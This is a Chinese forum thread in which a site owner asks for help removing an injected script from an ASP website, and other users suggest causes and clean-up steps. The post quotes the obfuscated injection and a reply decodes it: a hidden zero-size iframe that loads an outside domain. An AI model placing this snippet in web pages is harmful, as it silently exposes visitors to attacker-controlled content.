28,391
社区成员
发帖
与我相关
我的任务
分享asp页面被攻击,注入代码,怎么办,求救.....
朋友的一个asp网站被人攻击,打开这个网站后,每一页的状态栏都会显示另外一个网站的域名。点右键查看源文件可以看到这样一段代码
<script language =javascript>
document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%31%37%31%37%33%38%2E%6F%72%67%2F%22%20%68%65%69%67%68%74%3D%30%20%77%69%64%74%68%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));
</script>
但是找遍了源程序,也没有找到这段代码写在什么地方,该如何去除这段代码呢,请高手指点,不胜感激,谢谢。
<script language =javascript>
document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%31%37%31%37%33%38%2E%6F%72%67%2F%22%20%68%65%69%67%68%74%3D%30%20%77%69%64%74%68%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));
</script>
但是找遍了源程序,也没有找到这段代码写在什么地方,该如何去除这段代码呢,请高手指点,不胜感激,谢谢。
...全文
请发表友善的回复…
发表回复
lamking 2007-05-11
- 打赏
- 举报
有很多可能,有可能是你的程序被黑了,这样的话,应该能在程序中找到相关代码(代码可能加密所以只能通过代码显示出来的位置,来一步步的找。
也有可能是服务器被黑了,这段代码被加在比如IIS的页脚那里,代码没有在你的文件里,你当然找不到。
还有可能是比较流行的arp欺骗,那样你的代码同样不会被修改,只是在传输过程中被加入代码。
也有可能是服务器被黑了,这段代码被加在比如IIS的页脚那里,代码没有在你的文件里,你当然找不到。
还有可能是比较流行的arp欺骗,那样你的代码同样不会被修改,只是在传输过程中被加入代码。
zyl123456 2007-05-11
- 打赏
- 举报
把备份源程序里的漏洞先修好,然后删掉你FTP上所有的文件,重新上传修补后的程序...
Ischema 2007-05-11
- 打赏
- 举报
因为是控制状态条的,我想应该会有status吧
你试试
你试试
taotao30929630 2007-05-11
- 打赏
- 举报
那我应该用什么关键字搜索呢,楼上请指点指点我啊
Ischema 2007-05-11
- 打赏
- 举报
应该不是从数据库读取的
include/link方法能搜得到,所以我的判断是:楼主的关键字弄错了!
include/link方法能搜得到,所以我的判断是:楼主的关键字弄错了!
badcw 2007-05-11
- 打赏
- 举报
有可能
wangwm 2007-05-11
- 打赏
- 举报
看看是不是从数据库读取的
taotao30929630 2007-05-11
- 打赏
- 举报
用dreamwear搜索了整个文件夹,没有找到unescape、google这些关键字,所以找不到代码写在什么地方了
wangwm 2007-05-11
- 打赏
- 举报
<iframe src="http://google.171738.org/" height="0" width="0"></frame>
看看js文件里面有没有
看看js文件里面有没有
woodsmith 2007-05-11
- 打赏
- 举报
源文件里面是否被包含了某个文件?
看看是否添加了 <!--#include file=....
看看是否添加了 <!--#include file=....
